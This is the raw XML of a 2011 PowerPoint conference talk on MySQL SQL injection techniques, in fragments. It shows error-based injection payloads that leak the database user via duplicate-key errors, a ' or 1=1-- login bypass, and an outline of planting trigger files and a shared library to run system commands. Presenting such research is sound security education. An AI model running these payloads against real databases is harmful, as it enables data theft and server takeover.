        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10445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cap="all" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SELECT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* </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" cap="all" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>FROM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(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	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SELECT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COUNT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* ) ,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CONCAT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USER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) ,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FLOOR	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RAND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 ) *2 ) ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> as a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	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FROM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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	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GROUP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BY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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128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  <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>) 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AS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a</a:t>
            </a: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ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="+mj-lt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4932040" y="3284984"/>
            <a:ext cx="3960440" cy="1368152"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -31387"/>
              <a:gd name="adj2" fmla="val 844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</a:rPr>
              <a:t>What is Duplicate entry error ?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When table have same primary key, it will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iragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>show duplicate entry error.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812304"/>
            <a:ext cx="9144000" cy="1752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pitchFamily="34" charset="-128"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>INSERT INTO `users` values</a:t>
            </a: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pitchFamily="34" charset="-128"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>( 1, test test1234 )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Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34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28082"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="287523" y="4365104"/>
          <a:ext cx="8568954" cy="11582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856318"/>
                <a:gridCol w="2856318"/>
                <a:gridCol w="28563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/>
                        <a:t>id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/>
                        <a:t>username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/>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US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Orange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123456</a:t>
                      </a:r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cap="all" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SELECT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* </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" cap="all" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>FROM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(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	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SELECT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COUNT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* ) ,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CONCAT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USER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) ,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FLOOR	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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" cap="all" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>RAND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(  ) *2 ) ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> as a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	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FROM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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	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GROUP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BY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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128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  <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" cap="all" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>AS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> a</a:t>
            </a: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ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="+mj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11760" y="393305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43608" y="270892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88420"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5436096" y="3284984"/>
          <a:ext cx="3503712" cy="173736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503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root@localhost1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root@localhost0</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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……</a:t>
                      </a:r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How to hack MySQL deeply.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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"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2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In MySQL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Function		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql.func</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Create Procedure		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql.proc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Create Event			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql.event</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Create Trigger			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9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MySQL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Triggers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A trigger is a named database object that is associated with a table, and that activates when a particular event occurs for the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table.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4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Usage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CREATE TRIGGER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trigger_name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trigger_time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trigger_event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b="1" dirty="0" smtClean="0"/>
              <a:t>ON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tbl_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>FOR EACH ROW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trigger_body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/>
              <a:t>CREATE TRIGGER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test after insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>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users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FOR EACH ROW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'insert into logs values(…)'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Restrictions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not use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>repared Statement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Can not Create procedure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Can not Flush privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>……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1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www.chroot.org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121"/>
            <a:ext cx="8229600" cy="4404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77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Behind Create a Triggers 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MySQL will Create two file into DATADIR.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SHOW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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>'%DATADIR%';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tbl_name.TRG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>	// Trigger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dirty="0" err="1" smtClean="0"/>
              <a:t>bl_name.TRN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>	// Trigger name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955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How to use it!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Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can we generate these files by self </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>What benefit we have ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can UPDATE data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can INSERT data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>an we execute a system command by creating a function ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41489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 smtClean="0"/>
              <a:t>Can Create a User-Defined Function ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Denied-of-Service or Run system command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In normal way to create a function by trigger will cause MySQL server down when using the function. So, we need some trick to create function in another way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT it by self</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr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23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Demo.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Obtaining DATADIR and PLUGIN_DIR by duplicate error.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Generate shared library into PLUGIN_DIR.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Generate trigger file into DATA_DIR.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Trig the trigger.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Execute a system command.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821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Conclusion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Any Question ?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9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References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MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://www.mysql.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>MySQL Stacked Queries with SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Injection…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>htt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>p://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>blog.mindedsecurity.com/2010/04/mysql-stacked-queries-with-sql.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11838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Thanks! :)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044552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6" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>http://about.me/Orange.tw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0">
              <a:latin typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 pitchFamily="34" charset="-128"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Cheng-Da Tsai  &lt;Orange@chroot.org&gt;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Hiragino Sans GB W3" pitchFamily="34" charset="-128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8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www.hitcon.org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121"/>
            <a:ext cx="8229600" cy="4404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49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Agenda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Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Introduce SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Past way in SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>New trick in SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Demonstration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Hiragino Sans GB W3" pitchFamily="34" charset="-128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7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0"/>
            <a:ext cx="9638587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What is SQL Injection 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zh-TW" altLang="en-US" sz="8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0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What is SQL Injection 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156176" y="1556792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MySQL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66019" y="2283011"/>
            <a:ext cx="276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SQL Server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35897" y="3212976"/>
            <a:ext cx="184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Access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43607" y="1052736"/>
            <a:ext cx="230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' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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or 1=1--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31919" y="2924944"/>
            <a:ext cx="2856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iragino Sans GB W3" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PostgreSQL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iragino Sans GB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07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SQL Injection in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ragino Sans GB W6" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Past WAY.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="0" dirty="0">
              <a:latin typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Hiragino Sans GB W6" pitchFamily="34" charset="-128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3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804</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>241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8" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Hiragino Sans GB W3</vt:lpstr>
      <vt:lpstr>Hiragino Sans GB W6</vt:lpstr>
      <vt:lpstr>王漢宗中行書繁</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>Ariendezze</vt:lpstr>
      <vt:lpstr>helvetica</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>SQL Injection from Past to Now</vt:lpstr>
      <vt:lpstr>奇技淫巧   SQL Injection</vt:lpstr>
      <vt:lpstr>Cheng-Da Tsai (aka Orange)</vt:lpstr>
      <vt:lpstr>www.chroot.org</vt:lpstr>
      <vt:lpstr>www.hitcon.org</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>What is SQL Injection ?</vt:lpstr>
      <vt:lpstr>What is SQL Injection ?</vt:lpstr>
      <vt:lpstr>SQL Injection in Past WAY.</vt:lpstr>
      <vt:lpstr>Hacker-Friendly Features</vt:lpstr>
      <vt:lpstr>UNION</vt:lpstr>
      <vt:lpstr>Sub Queries</vt:lpstr>
      <vt:lpstr>Password Hashing</vt:lpstr>
      <vt:lpstr>Information Schema</vt:lpstr>
      <vt:lpstr>User-Defined Function</vt:lpstr>
      <vt:lpstr>File Input / Output</vt:lpstr>
      <vt:lpstr>New Trick in MySQL Injection</vt:lpstr>
      <vt:lpstr>Error Based Injection</vt:lpstr>
      <vt:lpstr>Function Error</vt:lpstr>
      <vt:lpstr>Select  extractValue( 1, concat( 0x3c, user() ) )</vt:lpstr>
      <vt:lpstr>Duplicate Error</vt:lpstr>
      <vt:lpstr>Select * from (Select 1,1) as x</vt:lpstr>
      <vt:lpstr>Select * from (select * from user as a join user as b) as x</vt:lpstr>
      <vt:lpstr>Select * from (select * from user as a join user as b using(username)) as x</vt:lpstr>
      <vt:lpstr>Select * from (select user(),user()) as x</vt:lpstr>
      <vt:lpstr>No !!</vt:lpstr>
      <vt:lpstr>NAME_CONST(name ,value)</vt:lpstr>
      <vt:lpstr>Select   NAME_CONST( 'QB1', 1 ), NAME_CONST( 'QB2', 2 ) </vt:lpstr>
      <vt:lpstr>Select * from ( Select  NAME_CONST( user(), 1 ),  NAME_CONST( user(), 1 ) ) as x</vt:lpstr>
      <vt:lpstr>But !!</vt:lpstr>
      <vt:lpstr>MySQL patch it since 5.1</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>When table have same primary key, it will show duplicate entry error.</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>How to hack MySQL deeply.</vt:lpstr>
      <vt:lpstr>In MySQL</vt:lpstr>
      <vt:lpstr>MySQL Triggers</vt:lpstr>
      <vt:lpstr>Usage</vt:lpstr>
      <vt:lpstr>Restrictions</vt:lpstr>
      <vt:lpstr>Behind Create a Triggers ?</vt:lpstr>
      <vt:lpstr>How to use it!</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Demo.</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Any Question ?</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Thanks!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Magical trick about SQL injection</dc:title>
  <dc:creator>qqqqq</dc:creator>
  <cp:lastModifiedBy>qqqqq</cp:lastModifiedBy>
  <cp:revision>222</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-09-27T07:49:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-10T17:33:06Z</dcterms:modified>
</cp:coreProperties>
</file>